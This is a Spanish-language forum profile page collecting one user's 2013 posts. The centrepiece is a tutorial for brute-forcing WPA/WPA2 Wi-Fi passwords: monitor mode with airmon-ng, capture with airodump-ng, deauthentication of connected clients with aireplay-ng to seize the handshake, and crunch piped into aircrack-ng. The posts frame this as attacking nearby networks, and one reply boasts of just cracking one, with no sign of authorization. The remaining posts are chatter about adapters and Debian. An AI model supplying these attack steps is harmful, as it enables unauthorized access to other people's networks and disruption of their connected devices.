Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Blackfall

#1
Hacking Wireless / Re: Hacking wpa-wpa2 fuerza bruta
8 Septiembre 2013, 17:06 PM
Cita de: x0bs en  4 Septiembre 2013, 18:21 PM
Es diferente, no es fuerza bruta sino una vulnerabilidad en el sistema de proteccion WPS, ademas no sirve con todos los routers/modems.

:laugh:

lo eliminaron?   :huh:
#2
Cita de: Sh4k4 en 30 Agosto 2013, 08:01 AM
Mas bien es... ¿cuantas keys por segundo crackeas?... entre mas mas rapido, menos... tiempo. Todo se reduce al poder de tu PC en precesar mas keys.

jeje apenas 1 mega, jajaja pero solo es la tarjeta de la laptop, quiero conseguir un Alfa Network AWUS036NHA pero ahi voy jaja a ver si me puedes recomendar otro mejor jejeje
#3
GNU/Linux / Re: preugunta sobre Debian
29 Agosto 2013, 21:01 PM
ok, muchas gracias, y si soy nuevo, pero ya intente con ubuntu, y sinceramente me gusta mas debian jejeje, a probar entonces, ojala me funcione, aunque también estaba viendo una lista de los que son soportados en wifiway y no se si esos cuentan también para Debian...
#4
Cita de: x0bs en 29 Agosto 2013, 07:57 AM
Excelente  ;D Lo acabo de probar con una red (con una pass facil, eso si, para que no tardara tanto) y funciona perfectamente, conocía la herramienta crunch pero no sabia que podía hacer eso con el aircrack xD

Gracias

jeje ok, de nada, yo en este mismo momento acabo de conseguir una, y se toma su tiempo, pero se llega a la meta, así ya no estas haciendo las listas o bajándotelas  y esperando que en esas listas este el pass, con crunch siento que se te hace más seguro conseguirlo, aunque se tarde jeje,, y este conviene más cuando igual que yo, estas rodeado de WIFIs con wpa-wpa2 jejeje y me agrada que te haya funcionado  ;D saludos.
#5
GNU/Linux / preugunta sobre Debian
27 Agosto 2013, 20:46 PM
Mepreguntaba si todos los adaptadores usb de wifi son compatibles con Debian o hay algunos especificos que sean compatibles??...
#6
Tengo una duda, no se si es algo ilógica pero ahi va....
me pregunto si ¿¿estos mismos adaptadores sirven para Debian??
#7
Hacking Wireless / Hacking wpa-wpa2 fuerza bruta
26 Agosto 2013, 09:33 AM
Bueno este es mi primer "aporte" (en realidad me base en algunos tutoriales que vi y uni segu me parecio mejor), asi que si cometo algun error espero me corrijan.

aqui dejo uno de los tut. que leí

http://www.miralapantalla.com/auditorias-backtrack-5-crackear-claves-wpawpa2-sin-diccionario/

Descifrar wpa-wpa2 sin diccionario con crunch

Yo se que hay muchos que estan aburridos de estar haciendo o descargando diccionarios para hacer el uso de "la fuerza bruta", aunque lo que <<en mi opinion>> eso no es fuerza bruta, si no una cosa de suerte, aqui les digo como hacer el uso de "la fuerza bruta" para descifrar una wpa-wpa2.

primero descargarse el crunch.

http://db.tt/sXflhAeR

después lo instalas (esto lo saque del tuto del link de arriba).

vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:

tar -xvzf crunch-3.3.tgz

Entramos en el directorio donde se acaba de descomprimir escribiendo:

cd crunch-3.3

Vamos a la carpeta y abrimos el archivo MakeFile para donde pone (en gedit tecleando $ gedit Makefile):

val:    crunch.c @echo "Building valgrind compatible binary..."
$(CC) $(VCFLAGS) $(LFS) $? -o crunch


Cambiar la última línea por:

$(CC) $? $(VCFLAGS) $(LFS) -o crunch

Y en donde pone:

crunch: crunch.c
@echo "Building binary..."
$(CC) $(CFLAGS) $(LFS) $? -o $@


Cambiar la última línea por:

$(CC) $? $(CFLAGS) $(LFS) -o $@

Guardamos y nuevamente en el terminal escribiremos:

make install

Para copiarlo en el sbin haciendo así:

cp crunch /usr/sbin/

hasta ahi va la instalación de crunch....

Ahora viene lo bueno...

si de casualidad no tienes todas las herramientas (aircrack-ng) puedes descargarlas de aquí:

http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz

y aqui les dejo algo de como instalarlo:

http://www.bluegehena.com/2012/12/instalar-aircrack-ng-en-linux-mint-13.html


Volviendo al tema......

vamos a la terminal y corremos airmon-ng (como supongo que algunos ya saben jeje).

tecleamos airmon-ng y activamos modo monitor, en mi caso es:

airmon-ng start wlan0

luego, vamos a analizar las redes:

airodump-ng mon0

ahora se elige la red a crackear:

airodump-ng -w crack (cualquier nombre aqui) -c 6 (canal que utiliza la red) --bssid xx:xx:xx:xx:xx (mac de la red que estamos atacando) mon0 (interfaz utilizada)

Ok, hasta aquí igual al cracking de wep, ahora vamos a conseguir el handshake  ;-) que es un archivo que manda el ordenador con la contraseña al router para que este acepte la conexión. Podemos esperar a que un cliente se conecte, o si no, si hay algún cliente conectado, procederemos a su desautentificación para que se desconecte y al volverse a conectar capturemos su Handshake :

aireplay-ng -0 00 (00 es el numero de veces que queremos que se intente desautentificar, con 50 suele llegar) -a (mac del router) -c (mac del cliente que está conectado, aparece justo debajo de donde pone station) (interface que estamos usando).

aquí talves te pida que pongas el nombre de la red (a mi me paso jeje) asi que solo pones -e [NombreDeLaRed] y algunos otros problemas jeje  :silbar:

ahora al tener el handshake viene lo siguiente:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

8 9 igual el numero de digitos de la pass y 0123456789 los digitos que utilizara para hacer las combinaciones.

aquí llega el ejemplo de la pag. que ví, lo que no dice es que puedes poner por ejemplo:

abcdefghixyz0123456789 y te mezclara las combinaciones con las letras!!
así es posible llegar a cualquier contraseña porque tecleara todas las combinaciones posibles.... el problema es cuando jejeje

aquí es donde se ve la verdadera fuerza bruta.

Porque si no se te ocurre cual contrseña puede ser, solo dejas esto correr hasta que salga, pero eso si, ¡¡tienes que ser paciente!! jajaja

Espero les sirva, la pregunta no es: ¿¿se puede crackear una wpa-wpa2 sin diccionario?? si no : ¿¿Cuanto se tarda?? jajaja muchas gracias, si cometí algun error me dicen por favor ^^'



#8
Cita de: sl320fl en 14 Agosto 2013, 00:35 AM
+1

Yo añadiría que aparte de estudiar las herramientas por separado, es estudiar la teoría que hay por debajo de ellas, por ejemplo: Si vas a estudiar los tipos de port scanning que tiene Nmap (ACK Scan, Null Scan, SYN Scan, entre otros) debes tener fuertes fundamentos de cómo funciona el protocolo TCP para entender qué pasa "por debajo". Entendiendo todo eso, podrías hasta hacer esos port scanning con nping e interpretar los resultados tú mismo.

Backtrack simplemente es una distribución GNU/Linux que reúne gran cantidad de herramientas de seguridad para usar sin "complicarnos" con la instalación de éstas.

si yo se, estuve leyendo unos post sobre eso, como van las redes,tcp/ip, los tipos de escaneo de nmap, y si yo entiendo que eso es backtrack y si, entiendo que seria mejor conseguir a parte las herramientas, asi no llenas de cosas que quizas nunca necesitaras  tu pc jeje ^^
#9
Seguridad / Re: virus en memoria
17 Agosto 2013, 02:31 AM
ok , muchas gracias ^^
#10
Seguridad / Re: virus en memoria
14 Agosto 2013, 21:42 PM
Gracias. pero tampoco me funciono... cuando la voy a formatear se desmonta ...  :(